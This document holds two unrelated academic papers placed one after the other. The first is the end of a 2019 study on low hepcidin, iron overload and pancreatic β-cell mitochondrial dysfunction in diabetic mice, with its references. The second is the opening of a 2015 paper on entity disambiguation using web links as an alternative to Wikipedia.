Lv et al. Low hepcidin impaired mitochondria function 1588:3 Our results indicate that decreased iron deposition in the pancreatic tissue can decrease blood glucose in a T2DM animal and cell model, for which the associated mechanism has also been discussed above. Another study conducted by Cooksey also confirmed our resulted that restriction iron intake or with iron chelation could Figure 5 db/db mice were fed either a normal diet chow, low iron content diet chow or iron chelator for 7 weeks. Body weight and fasting blood glucose (FBG) levels were recorded every week and then integrated as curve chart (A and B). IPGTT, HbA1C% and fasting insulin content (FIns) were recorded at 4 and 10 weeks (C, D, and E). The level of ferritin was measured using an ELISA (F). *indicates P < 0.05 compared with the control group. △indicates P < 0.05 compared with the db/db group. Correlations between ferritin levels and FBG, IPGTT, HbA1C%, FIns (G, H, I and J). Regression lines and 95% confidence intervals are plotted if statistical significance is present. R presented the correlation coefficient of linear regression models. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 159 PB–12 8:3 significantly ameliorate high blood glucose in ob/ob mice (27) (mouse model for type 2 diabetes, the ob/ob Lep−/−). But it showed a better effect on glucose control in iron chelator group than low iron chow diet group. While in our study the FBG, IPGTT, HbA1C% and FIns level between this two groups with no statistical difference in db/db mice. In Cooksey’t study, they inferred that 35 mg/kg iron content chow would induce iron-deficiency anemia in ob/ob mice which restricted hypoglycemic effect. In our study, with this dosage iron diet feed, the hemoglobin (Hb) content was maintained at normal levels at 10 week, once the diet contains less than 20 mg/kg iron, the mice began to displayed low levels of Hb, erythrocyte mean corpuscular volume (MCV), mean corpuscular hemoglobin (MCH), and were diagnosed as having iron- deficiency anemia at 10 weeks (Supplementary Fig. 6). We also found body weight was lower in iron restriction diet group (Supplementary Fig. 5). The reason for slower weight increase in mouse due to iron restriction was unknown yet. Although we achieved a satisfactory improvement in blood glucose for the early onset of T2DM in db/db mice (10 weeks) with iron restriction, whether iron treatment will have an effect in a long-term group of db/db mice remains unknown. In the early stage of T2DM, the effect of impaired ROS production on mitochondrial function and the impact of oxidative stress on β-cell function are reversible. Thus, alleviating the toxic effects of iron accumulation could significantly restore the function of β-cells. However, when β-cell functionality has been irreparable destroyed, simply correcting the expression of hepcidin and inhibiting iron deposition may have little to no effect on blood glucose levels. At this stage, improving insulin signaling and insulin resistance would be a more appropriate treatment (40). In conclusion, we have identified a hepcidin- mediated pathway of glucotoxicity, resulting in impaired β-cell functionality. The decreased hepcidin expression could lead to iron accumulation in the cytoplasm and mitochondria. The mitochondrial membrane potential was depolarized, which inhibited ATP synthesis and promoted excessive ROS production inducing oxidative stress. Abnormal iron metabolism in the mitochondria eventually impaired insulin secretion as Fig. 6 showed. Relieved iron overload status had a positive effect on the blood glucose control in the early onset of T2DM in db/db mice. Thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. Supplementary data This is linked to the online version of the paper at https://doi.org/10.1530/ EC-18-0516. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This work was supported by a grant from the Health and Family Planning Commission of Wuxi City (Q201739). Figure 6 Diagram depicting the role of hepcidin-mediated glucose toxicity on pancreatic β cell. With hyperglycemia stimulation, hepcidin expression decreased leading to iron overload in the cytosol. The excessive iron could squeeze into mitochondria via Mcfu transported causing ΔΨm depolarization; inhibited ATP production and induced massive ROS production. The dysfunction of mitochondria inevitably led to insulin secretion decrease in pancreatic β cells. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access https://doi.org/10.1530/EC-18-0516 https://doi.org/10.1530/EC-18-0516 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 1608:3 Author contribution statement All authors took part in the conception and design of the study, as well as either drafting or critically revising the manuscript. All authors have approved the final version of the manuscript. Tingting Shu, Zhigang Lv, Yuchun Xie and Junming Tang collected the data and carried out the data analysis. Xvhua Mao is responsible for the integrity of the work as a whole. Data availability statement The datasets used and analyzed during the current study are available from the corresponding author on reasonable request. References 1 Daher R, Manceau H & Karim Z. Iron metabolism and the role of the iron-regulating hormone hepcidin in health and disease. Presse Medicale 2017 46 e272–e278. (https://doi.org/10.1016/j. lpm.2017.10.006) 2 Kuhn LC. Iron regulatory proteins and their role in controlling iron metabolism. Metallomics: Integrated Biometal Science 2015 7 232–243. (https://doi.org/10.1039/c4mt00164h) 3 Kulaksiz H, Fein E, Redecker P, Stremmel W, Adler G & Cetin Y. Pancreatic beta-cells express hepcidin, an iron-uptake regulatory peptide. Journal of Endocrinology 2008 197 241–249. (https://doi. org/10.1677/JOE-07-0528) 4 Aigner E, Felder TK, Oberkofler H, Hahne P, Auer S, Soyal S, Stadlmayr A, Schwenoha K, Pirich C, Hengster P, et al. Glucose acts as a regulator of serum iron by increasing serum hepcidin concentrations. Journal of Nutritional Biochemistry 2013 24 112–117. (https://doi.org/10.1016/j.jnutbio.2012.02.017) 5 Backe MB, Moen IW, Ellervik C, Hansen JB & Mandrup-Poulsen T. Iron regulation of pancreatic beta-cell functions and oxidative stress. Annual Review of Nutrition 2016 36 241–273. (https://doi. org/10.1146/annurev-nutr-071715-050939) 6 Fernandez-Real JM, McClain D & Manco M. Mechanisms linking glucose homeostasis and iron metabolism toward the onset and progression of Type 2 diabetes. Diabetes Care 2015 38 2169–2176. (https://doi.org/10.2337/dc14-3082) 7 Aregbesola A, Voutilainen S, Virtanen JK, Aregbesola A & Tuomainen TP. Serum hepcidin concentrations and type 2 diabetes. World Journal of Diabetes 2015 6 978–982. (https://doi.org/10.4239/ wjd.v6.i7.978) 8 Simcox JA & McClain DA. Iron and diabetes risk. Cell Metabolism 2013 17 329–341. (https://doi.org/10.1016/j.cmet.2013.02.007) 9 Pechlaner R, Weiss G, Bansal S, Mayr M, Santer P, Pallhuber B, Notdurfter M, Bonora E, Willeit J & Kiechl S. Inadequate hepcidin serum concentrations predict incident type 2 diabetes mellitus. Diabetes/Metabolism Research and Reviews 2016 32 187–192. (https:// doi.org/10.1002/dmrr.2711) 10 Suarez-Ortegon MF, Moreno M, Arbelaez A, Xifra G, Mosquera M, Moreno-Navarrete JM, Aguilar-de Plata C, Esteve E, Ricart W & Fernandez-Real JM. Circulating hepcidin in type 2 diabetes: a multivariate analysis and double blind evaluation of metformin effects. Molecular Nutrition and Food Research 2015 59 2460–2470. (https://doi.org/10.1002/mnfr.201500310) 11 Khan AR & Awan FR. Metals in the pathogenesis of type 2 diabetes. Journal of Diabetes and Metabolic Disorders 2014 13 16. (https://doi. org/10.1186/2251-6581-13-16) 12 Liu KL, Chen PY, Wang CM, Chen WY, Chen CW, Owaga E & Chang JS. Dose-related effects of ferric citrate supplementation on endoplasmic reticular stress responses and insulin signalling pathways in streptozotocin-nicotinamide-induced diabetes. Food and Function 2016 7 194–201. (https://doi.org/10.1039/c5fo01252j) 13 Choi JS, Koh IU, Lee HJ, Kim WH & Song J. Effects of excess dietary iron and fat on glucose and lipid metabolism. Journal of Nutritional Biochemistry 2013 24 1634–1644. (https://doi.org/10.1016/j. jnutbio.2013.02.004) 14 Mao X, Chen H, Tang J, Wang L & Shu T. Hepcidin links gluco- toxicity to pancreatic beta cell dysfunction by inhibiting Pdx-1 expression. Endocrine Connections 2017 6 121–128. (https://doi. org/10.1530/EC-16-0115) 15 Zhao N, Zhang AS & Enns CA. Iron regulation by hepcidin. Journal of Clinical Investigation 2013 123 2337–2343. (https://doi.org/10.1172/ JCI67225) 16 Rishi G, Wallace DF & Subramaniam VN. Hepcidin: regulation of the master iron regulator. Bioscience Reports 2015 35 e00192. (https://doi. org/10.1042/BSR20150014) 17 Hu J, Kholmukhamedov A, Lindsey CC, Beeson CC, Jaeschke H & Lemasters JJ. Translocation of iron from lysosomes to mitochondria during acetaminophen-induced hepatocellular injury: protection by starch-desferal and minocycline. Free Radical Biology and Medicine 2016 97 418–426. (https://doi.org/10.1016/j. freeradbiomed.2016.06.024) 18 Lee HJ, Choi JS, Lee HJ, Kim WH, Park SI & Song J. Effect of excess iron on oxidative stress and gluconeogenesis through hepcidin during mitochondrial dysfunction. Journal of Nutritional Biochemistry 2015 26 1414–1423. (https://doi.org/10.1016/j. jnutbio.2015.07.008) 19 Nam E, Han J, Suh JM, Yi Y & Lim MH. Link of impaired metal ion homeostasis to mitochondrial dysfunction in neurons. Current Opinion in Chemical Biology 2018 43 8–14. (https://doi.org/10.1016/j. cbpa.2017.09.009) 20 Gerencser AA. Metabolic activation-driven mitochondrial hyperpolarization predicts insulin secretion in human pancreatic beta-cells. Biochimica et Biophysica Acta – Bioenergetics 2018 1859 817–828. (https://doi.org/10.1016/j.bbabio.2018.06.006) 21 Zhou Z, Ribas V, Rajbhandari P, Drew BG, Moore TM, Fluitt AH, Reddish BR, Whitney KA, Georgia S, Vergnes L, et al. Estrogen receptor alpha protects pancreatic beta-cells from apoptosis by preserving mitochondrial function and suppressing endoplasmic reticulum stress. Journal of Biological Chemistry 2018 293 4735–4751. (https://doi.org/10.1074/jbc.M117.805069) 22 Vecchi C, Montosi G, Zhang K, Lamberti I, Duncan SA, Kaufman RJ & Pietrangelo A. ER stress controls iron metabolism through induction of hepcidin. Science 2009 325 877–880. (https://doi. org/10.1126/science.1176639) 23 Zhu Y, Shu T, Lin Y, Wang H, Yang J, Shi Y & Han X. Inhibition of the receptor for advanced glycation endproducts (RAGE) protects pancreatic beta-cells. Biochemical and Biophysical Research Communications 2011 404 159–165. (https://doi.org/10.1016/j. bbrc.2010.11.085) 24 Chen J, Saxena G, Mungrue IN, Lusis AJ & Shalev A. Thioredoxin- interacting protein: a critical link between glucose toxicity and beta- cell apoptosis. Diabetes 2008 57 938–944. (https://doi.org/10.2337/ db07-0715) 25 Qiao N, Xu C, Zhu YX, Cao Y, Liu DC & Han X. Ets-1 as an early response gene against hypoxia-induced apoptosis in pancreatic beta- cells. Cell Death and Disease 2015 6 e1650. (https://doi.org/10.1038/ cddis.2015.8) 26 Blanchette NL, Manz DH, Torti FM & Torti SV. Modulation of hepcidin to treat iron deregulation: potential clinical applications. Expert Review of Hematology 2016 9 169–186. (https://doi.org/10.1586 /17474086.2016.1124757) 27 Cooksey RC, Jones D, Gabrielsen S, Huang J, Simcox JA, Luo B, Soesanto Y, Rienhoff H, Abel ED & McClain DA. Dietary iron restriction or iron chelation protects from diabetes and loss of beta- cell function in the obese (ob/ob lep-/-) mouse. American Journal of Physiology. Endocrinology and Metabolism 2010 298 E1236–E1243. (https://doi.org/10.1152/ajpendo.00022.2010) This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access https://doi.org/10.1016/j.lpm.2017.10.006 https://doi.org/10.1016/j.lpm.2017.10.006 https://doi.org/10.1039/c4mt00164h https://doi.org/10.1677/JOE-07-0528 https://doi.org/10.1677/JOE-07-0528 https://doi.org/10.1016/j.jnutbio.2012.02.017 https://doi.org/10.1146/annurev-nutr-071715-050939 https://doi.org/10.1146/annurev-nutr-071715-050939 https://doi.org/10.2337/dc14-3082 https://doi.org/10.4239/wjd.v6.i7.978 https://doi.org/10.4239/wjd.v6.i7.978 https://doi.org/10.1016/j.cmet.2013.02.007 https://doi.org/10.1002/dmrr.2711 https://doi.org/10.1002/dmrr.2711 https://doi.org/10.1002/mnfr.201500310 https://doi.org/10.1186/2251-6581-13-16 https://doi.org/10.1186/2251-6581-13-16 https://doi.org/10.1039/c5fo01252j https://doi.org/10.1016/j.jnutbio.2013.02.004 https://doi.org/10.1016/j.jnutbio.2013.02.004 https://doi.org/10.1530/EC-16-0115 https://doi.org/10.1530/EC-16-0115 https://doi.org/10.1172/JCI67225 https://doi.org/10.1172/JCI67225 https://doi.org/10.1042/BSR20150014 https://doi.org/10.1042/BSR20150014 https://doi.org/10.1016/j.freeradbiomed.2016.06.024 https://doi.org/10.1016/j.freeradbiomed.2016.06.024 https://doi.org/10.1016/j.jnutbio.2015.07.008 https://doi.org/10.1016/j.jnutbio.2015.07.008 https://doi.org/10.1016/j.cbpa.2017.09.009 https://doi.org/10.1016/j.cbpa.2017.09.009 https://doi.org/10.1016/j.bbabio.2018.06.006 https://doi.org/10.1074/jbc.M117.805069 https://doi.org/10.1126/science.1176639 https://doi.org/10.1126/science.1176639 https://doi.org/10.1016/j.bbrc.2010.11.085 https://doi.org/10.1016/j.bbrc.2010.11.085 https://doi.org/10.2337/db07-0715 https://doi.org/10.2337/db07-0715 https://doi.org/10.1038/cddis.2015.8 https://doi.org/10.1038/cddis.2015.8 https://doi.org/10.1586/17474086.2016.1124757 https://doi.org/10.1586/17474086.2016.1124757 https://doi.org/10.1152/ajpendo.00022.2010 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 161 PB–12 8:3 28 Girelli D, Nemeth E & Swinkels DW. Hepcidin in the diagnosis of iron disorders. Blood 2016 127 2809–2813. (https://doi.org/10.1182/ blood-2015-12-639112) 29 Saporito-Magrina C, Musacco-Sebio R, Acosta JM, Bajicoff S, Paredes-Fleitas P, Reynoso S, Boveris A & Repetto MG. Copper(II) and iron(III) ions inhibit respiration and increase free radical- mediated phospholipid peroxidation in rat liver mitochondria: effect of antioxidants. Journal of Inorganic Biochemistry 2017 172 94–99. (https://doi.org/10.1016/j.jinorgbio.2017.04.012) 30 Moles A, Torres S, Baulies A, Garcia-Ruiz C & Fernandez-Checa JC. Mitochondrial-lysosomal axis in acetaminophen hepatotoxicity. Frontiers in Pharmacology 2018 9 453. (https://doi.org/10.3389/ fphar.2018.00453) 31 Urrutia PJ, Aguirre P, Tapia V, Carrasco CM, Mena NP & Nunez MT. Cell death induced by mitochondrial complex I inhibition is mediated by iron regulatory protein 1. Biochimica et Biophysica Acta – Molecular Basis of Disease 2017 1863 2202–2209. (https://doi. org/10.1016/j.bbadis.2017.05.015) 32 Zhao MH, Liang S, Kim SH, Cui XS & Kim NH. Fe(III) is essential for porcine embryonic development via mitochondrial function maintenance. PLOS ONE 2015 10 e0130791. (https://doi. org/10.1371/journal.pone.0130791) 33 Hirota K. An intimate crosstalk between iron homeostasis and oxygen metabolism regulated by the hypoxia-inducible factors (HIFs). Free Radical Biology and Medicine 2018 133 118–129. (https:// doi.org/10.1016/j.freeradbiomed.2018.07.018) 34 Hansen JB, Dos Santos LRB, Liu Y, Prentice KJ, Teudt F, Tonnesen M, Jonas JC, Wheeler MB & Mandrup-Poulsen T. Glucolipotoxic conditions induce β-cell iron import, cytosolic ROS formation and apoptosis. Journal of Molecular Endocrinology 2018 61 69–77. (https:// doi.org/10.1530/jme-17-0262) 35 Mastrogiannaki M, Matak P, Keith B, Simon MC, Vaulont S & Peyssonnaux C. HIF-2alpha, but not HIF-1alpha, promotes iron absorption in mice. Journal of Clinical Investigation 2009 119 1159–1166. (https://doi.org/10.1172/JCI38499) 36 Shah YM, Matsubara T, Ito S, Yim SH & Gonzalez FJ. Intestinal hypoxia-inducible transcription factors are essential for iron absorption following iron deficiency. Cell Metabolism 2009 9 152–164. (https://doi.org/10.1016/j.cmet.2008.12.012) 37 Matsunaga T, Li S, Adachi T, Joo E, Gu N, Yamazaki H, Yasuda K, Kondoh T & Tsuda K. Hyperoxia reverses glucotoxicity-induced inhibition of insulin secretion in rat INS-1 beta cells. Bioscience, Biotechnology, and Biochemistry 2014 78 843–850. (https://doi.org/10. 1080/09168451.2014.905175) 38 Bensellam M, Duvillie B, Rybachuk G, Laybutt DR, Magnan C, Guiot Y, Pouyssegur J & Jonas JC. Glucose-induced O(2) consumption activates hypoxia inducible factors 1 and 2 in rat insulin-secreting pancreatic beta-cells. PLOS ONE 2012 7 e29807. (https://doi.org/10.1371/journal.pone.0029807) 39 Suzuki K, Sato Y, Kai S, Nishi K, Adachi T, Matsuo Y & Hirota K. Volatile anesthetics suppress glucose-stimulated insulin secretion in MIN6 cells by inhibiting glucose-induced activation of hypoxia- inducible factor 1. PeerJ 2015 3 e1498. (https://doi.org/10.7717/ peerj.1498) 40 Mitrakou A, Katsiki N & Lalic NM. Type 2 diabetes mellitus and the elderly: an update on drugs used to treat glycaemia. Current Vascular Pharmacology 2017 15 19–29. (https://doi.org/10.2174/15701611146 66160822154816) Received in final form 1 January 2019 Accepted 21 January 2019 This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access https://doi.org/10.1182/blood-2015-12-639112 https://doi.org/10.1182/blood-2015-12-639112 https://doi.org/10.1016/j.jinorgbio.2017.04.012 https://doi.org/10.3389/fphar.2018.00453 https://doi.org/10.3389/fphar.2018.00453 https://doi.org/10.1016/j.bbadis.2017.05.015 https://doi.org/10.1016/j.bbadis.2017.05.015 https://doi.org/10.1371/journal.pone.0130791 https://doi.org/10.1371/journal.pone.0130791 https://doi.org/10.1016/j.freeradbiomed.2018.07.018 https://doi.org/10.1016/j.freeradbiomed.2018.07.018 https://doi.org/10.1530/jme-17-0262 https://doi.org/10.1530/jme-17-0262 https://doi.org/10.1172/JCI38499 https://doi.org/10.1016/j.cmet.2008.12.012 https://doi.org/10.1080/09168451.2014.905175 https://doi.org/10.1080/09168451.2014.905175 https://doi.org/10.1371/journal.pone.0029807 https://doi.org/10.7717/peerj.1498 https://doi.org/10.7717/peerj.1498 https://doi.org/10.2174/1570161114666160822154816 https://doi.org/10.2174/1570161114666160822154816 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com Abstract Introduction Materials and methods Cell culture Virus construction and gene infected Pancreatic islet isolation GSIS assay Hepcidin and ferritin content analysis RNA extraction, reverse transcription and qRT-PCR Western blotting Fluorescence in situ hybridization (FISH) Cytosolic chelatable iron assay Prussian blue staining ROS determination Determination of mitochondrial membrane potential (Δψm) Determination of adenosine 5′-triphosphate (ATP) release Animals, treatment and blood parameter determination Statistical analysis Results Hyperglycemia inhibits hepcidin expression in db/db mice, cultured mouse islets and Min6 cells Low hepcidin expression induces iron overload in pancreatic β-cells Iron aggregation induces ROS generation which impairs mitochondria function Excess mitochondrial iron induces ΔΨm depolarization and inhibits ATP synthesis Effects of iron restriction on blood glucose levels and insulin levels in db/db mice Discussion Supplementary data Declaration of interest Funding Author contribution statement Data availability statement work_nj6cpocaafedndn4c5yt5dstbu ---- Entity Disambiguation with Web Links Andrew Chisholm School of Information Technologies University of Sydney NSW 2006, Australia andy.chisholm.89@gmail.com Ben Hachey School of Information Technologies University of Sydney NSW 2006, Australia ben.hachey@gmail.com Abstract Entity disambiguation with Wikipedia relies on structured information from redirect pages, article text, inter-article links, and categories. We explore whether web links can replace a curated encyclopaedia, obtaining entity prior, name, context, and coherence models from a corpus of web pages with links to Wiki- pedia. Experiments compare web link models to Wikipedia models on well-known CoNLL and TAC data sets. Results show that using 34 million web links approaches Wikipedia performance. Combin- ing web link and Wikipedia models produces the best-known disambiguation accuracy of 88.7 on standard newswire test data. 1 Introduction Entity linking (EL) resolves mentions in text to their corresponding node in a knowledge base (KB), or NIL if the entity is not in the KB. Wikipedia and related semantic resources – Freebase, DBpedia, Yago2– have emerged as general repositories of no- table entities. The availability of Wikipedia, in par- ticular, has driven work on EL, knowledge base pop- ulation (KBP), and semantic search. This literature demonstrates that the rich structure of Wikipedia– redirect pages, article text, inter-article links, cat- egories – delivers disambiguation accuracy above 85% on newswire (He et al., 2013; Alhelbawy and Gaizauskas, 2014). But what disambiguation accu- racy can we expect in the absence of Wikipedia’s curated structure? Web links provide much of the same information as Wikipedia inter-article links: anchors are used to derive alternative names and conditional probabili- ties of entities given names; in-link counts are used to derive a simple entity popularity measure; the text surrounding a link is used to derive textual con- text models; and overlap of in-link sources is used to derive entity cooccurrence models. On the other hand, web links lack analogues of additional Wiki- pedia structure commonly used for disambiguation, e.g., categories, encyclopaedic descriptions. More- over, Wikipedia’s editors ensure a clean and correct knowledge source while web links are a potentially noisier annotation source. We explore linking with web links versus Wiki- pedia. Contributions include: (1) a new bench- mark linker that instantiates entity prior probabili- ties, entity given name probabilities, entity context models, and efficient entity coherence models from Wikipedia-derived data sets; (2) an alternative linker that derives the same model using only alternative names and web pages that link to Wikipedia; (3) de- tailed development experiments, including analysis and profiling of Web link data, and a comparison of link and Wikipedia-derived models. Results suggest that web link accuracy is at least 93% of a Wikipedia linker and that web links are complementary to Wikipedia, with the best scores coming from a combination. We argue that these re- sults motivate open publishing of enterprise author- ities and suggest that accumulating incoming links should be prioritised at least as highly as adding richer internal structure to an authority. 145 Transactions of the Association for Computational Linguistics, vol. 3, pp. 145–156, 2015. Action Editor: Ryan McDonald. Submission batch: 10/2014; Revision batch 1/2015; Published 3/2015. c©2015 Association for Computational Linguistics. 2 Related work Thomas et al. (2014) describe a disambiguation ap- proach that exploits news documents that have been curated by professional editors. In addition to con- sistently edited text, these include document-level tags for entities mentioned in the story. Tags are exploited to build textual mention context, assign weights to alternative names, and train a disam- biguator. This leads to an estimated F1 score of 78.0 for end-to-end linking to a KB of 32,000 com- panies. Our work is similar, but we replace qual- ity curated news text with web pages and explore a larger KB of more than four million entites. In place of document-level entity tags, hyperlinks pointing to Wikipedia articles are used to build context, name and coherence models. This is a cheap form of third- party entity annotation with the potential for gener- alisation to any type of web-connected KB. How- ever, it presents an additional challenge in coping with noise, including prose that lacks editorial over- sight and links with anchor text that do not corre- spond to actual aliases. Li et al. (2013) explore a similar task setting for microblogs, where short mention contexts exacer- bate sparsity problems for underdeveloped entities. They address the problem by building a topic model based on Wikipedia mention link contexts. A boot- strapping approach analogous to query expansion augments the model using web pages returned from the Google search API. Results suggest that the bootstrapping process is beneficial, improving per- formance from approximately 81% to 87% accu- racy. We demonstrate that adding link data leads to similar improvements. The cold start task of the Text Analysis Confer- ence is also comparable.1 It evaluates how well sys- tems perform end-to-end NIL detection, clustering and slot filling. Input includes a large document col- lection and a slot filling schema. Systems return a KB derived from the document collection that con- forms to the schema. The evaluation target is long- tail or local knowledge. The motivation is the same as our setting, but we focus on cold-start linking rather than end-to-end KB population. Finally, recent work addresses linking without 1http://www.nist.gov/tac/2014/KBP/ ColdStart/guidelines.html and beyond Wikipedia. Jin et al. (2014) describe an unsupervised system for linking to a person KB from a social networking site, and Shen et al. (2014) de- scribe a general approach for arbitrary KBs. Nakas- hole et al. (2013) and Hoffart et al. (2014) add a tem- poral dimension to NIL detection by focusing on dis- covering and typing emerging entities. 3 Tasks and art Two evaluations in particular have driven compar- ative work on EL: the TAC KBP shared tasks and the Yago2 annotation of CoNLL 2003 NER data. We describe these tasks and their respective evaluation setup. A brief survey of results outlines the kind of performance we hope to achieve with link data. For task history, we suggest Hachey et al. (2013) and Shen et al. (2014). For an evaluation survey, see Hachey et al. (2014). Our evaluation setup follows He et al. (2013) for comparability to their state-of-the-art disambigua- tion results across CoNLL and TAC data. Table 1 summarises the data sets used. Columns correspond to number of documents (|D|), number of entities (|E|), number of mentions (|M|), and number of non-NIL mentions (|MKB|). The non-NIL mention number represents the set used for evaluation in the disambiguation experiments here. The table also in- cludes average and standard deviation of the candi- date set cardinality over MKB (〈C〉) and the percent- age of mentions in MKB where the correct resolu- tion is in the candidate set (RC). The last column (SOA) gives the state-of-the-art score from the liter- ature. Numbers are discussed below. 3.1 CoNLL CoNLL is a corpus of Reuters newswire annotated for whole-document named entity recognition and disambiguation (Hoffart et al., 2011). CoNLL is pub- lic, free and much larger than most entity annota- tion data sets, making it an excellent evaluation tar- get. It is based on the widely used NER data from the CoNLL 2003 shared task (Tjong Kim Sang and Meulder, 2003), building disambiguation on ground truth mentions. Training and development splits comprise 1,162 stories from 22-31 August 1996 and the held-out test split comprises 231 stories from 6-7 December 1996. 146 http://www.nist.gov/tac/2014/KBP/ColdStart/guidelines.html http://www.nist.gov/tac/2014/KBP/ColdStart/guidelines.html Data set |D| |E| |M| |MKB| (%) 〈C〉 (σ) RC SOA CoNLL train 945 4,080 23,396 18,505 (79) 69 (194) 100 NA CoNLL dev 216 1,644 5,917 4,791 (80) 73 (194) 100 79.7 CoNLL test 231 1,537 5,616 4,485 (80) 73 (171) 100 87.6 TAC train 1,040 456 1,500 1,070 (71) 23 (28) 94.4 NA TAC test 1,012 387 2,250 1,017 (45) 24 (30) 88.5 81.0 Table 1: Data sets for disambiguation tasks addressed here. Statistics are described in Section 3. The standard evaluation measure is precision@1 (p@1) – the percentage of linkable mentions for which the system ranks the correct entity first (Hof- fart et al., 2011). Linkable is defined as ground truth mentions for which the correct entity is a member of the candidate set. This factors out errors due to mention detection, coreference handling, and can- didate generation, isolating the performance of the proposed ranking models. For comparability, we use Hoffart et al.’s Yago2 means relations for candidate generation. These alternative names are harvested from Wikipedia disambiguation pages, redirects and inter-article links. In the Hoffart et al. setting, can- didate recall is 100%. There are several key benchmark results for the CoNLL data set. Hoffart et al. (2011) define the task settings and report the first results. They employ a global graph-based coherence algorithm, leading to a score of 82.5. He et al. (2013) present the most comparable approach. Using deep neural networks, they learn entity representations based on similar- ity between link contexts and article text in Wiki- pedia. They report performance of 84.8 without collective inference, and 85.6 when integrating Han et al.’s (2011) coherence algorithm. Finally, Al- helbawy and Gaizauskas (2014) report the current best performance of 87.6 using a collective approach over a document-specific subgraph. 3.2 TAC 2010 Since 2009, the Text Analysis Conference (TAC) has hosted an annual EL shared task as part of its Knowl- edge Base Population track (KBP) (Ji and Grishman, 2011). Through 2013, the task is query-driven. In- put includes a document and a name that appears in that document. Systems must output a KB identifier for each query, or NIL. The KB is derived from a subset of 818,741 Wikipedia articles. We use data from the 2010 shared task for several reasons. First, it facilitates comparison to current art. Second, it is a linking-only evaluation as opposed to linking plus NIL clustering. Finally, it includes comparable train- ing and test data rather than relying on data from earlier years for training. The TAC 2010 source collection includes news from various agencies and web log data. Train- ing data includes a specially prepared set of 1,500 web queries. Test data includes 2,250 queries – 1,500 news and 750 web log uniformly distributed across person, organisation, and geo-political en- tities. Candidate generation here uses the DBpe- dia lexicalizations data set (Mendes et al., 2012), article titles, and redirect titles. We also add ti- tles and redirects stripped of appositions indicated by a comma (e.g., Montgomery, Alabama) or opening round bracket (e.g., Joe Morris (trumpeter)). Candidate recall is 94.4 and 88.5 on the training and test sets – an upper limit on dis- ambiguation accuracy. Following He et al., we report KB accuracy (AKB ) - the percentage of correctly linked non-NIL men- tions - to isolate disambiguation performance. Be- fore evaluation, we map Wikipedia titles in our out- put to TAC KB identifiers using the Dalton and Di- etz (2013) alignment updated with Wikipedia redi- rects. To our knowledge, Cucerzan (2011) report the best AKB of 87.3 for an end-to-end TAC entity linking system, while He et al. (2013) report the best AKB of 81.0 for a disambiguation-focused evaluation. There are a number of differences, e.g.: mention detection for coherence, coreference modelling, and substring matching in candidate generation. Analysis shows that these can have a large effect on system perfor- mance (Hachey et al., 2013; Piccinno and Ferragina, 2014). We use He et al.’s setup to control for differ- ences and for comparability to He et al.’s results. 147 Component Articles Mentions Web links fprior 68.4 68.4 63.0 fname 69.2 69.2 58.4 fbow 50.6 55.8 62.2 fdbow 49.9 51.2 54.0 Table 2: p@1 results for individual components on the CoNLL development data. The first two columns corre- spond to the Wikipedia models described in Section 4.3, one derived from article text and the other from mention contexts. The last column corresponds to the web link models described in Section 5. 4 Wikipedia benchmark models A wide range of EL approaches have been proposed that take advantage of the clean, well-edited infor- mation in Wikipedia. These include entity prior models derived from popularity metrics; alias mod- els derived from Wikipedia redirects, disambigua- tion pages and inter-article links; textual context models derived from Wikipedia article text; and en- tity coherence models derived from the Wikipedia inter-article link graph. We survey these models and describe a new benchmark linker that instantiates them from existing Wikipedia-derived data sets. For a more detailed survey of features in supervised sys- tems, see Meij et al. (2012) and Radford (2014). Table 2 contains an overview of p@1 results for individual components on the CoNLL development data. 4.1 Entity prior The simplest approach to entity disambiguation ranks candidate entities in terms of their popu- larity. For example, 0.000001% of inter-article links in Wikipedia point to Nikola Tesla, while 0.000008% point to Tesla Motors. An entity prior is used in generative models (Guo et al., 2009; Han and Sun, 2011) and in supervised systems that incorporate diverse features (Radford et al., 2012). We define the entity prior as the probability of a link pointing to entity e: fprior(e) = log |I∗,e| |I∗,∗| where I∗,e ∈ I∗,∗ is the set of pages that link to entity e. We derive this from DBpedia’s Wikipedia Pagelinks data set, which contains the link graph between Wikipedia pages.2 Missing values are re- placed with a small default log probability of -20, which works better than add-one smoothing in de- velopment experiments. On the CoNLL development data, entity prior alone achieves 68.4 p@1. 4.2 Name probability Name probability models the relationship between a name and an entity. For example, 0.04% of links with the anchor text ‘Tesla’ point to Nikola Tesla, while 0.03% point to Tesla Motors. Name probability was introduced as an initial score in coherence-driven disambiguation (Milne and Wit- ten, 2008), and is used in most state-of-the-art sys- tems (Ferragina and Scaiella, 2010; Hoffart et al., 2011; Cucerzan, 2011; Radford et al., 2012). We define name probability as the conditional probabil- ity of a name referring to an entity: fname(e,n) = log |Mn,e| |Mn,∗| where Mn,e is the set of mentions with name n that refer to entity e and Mn,∗ is all mentions with 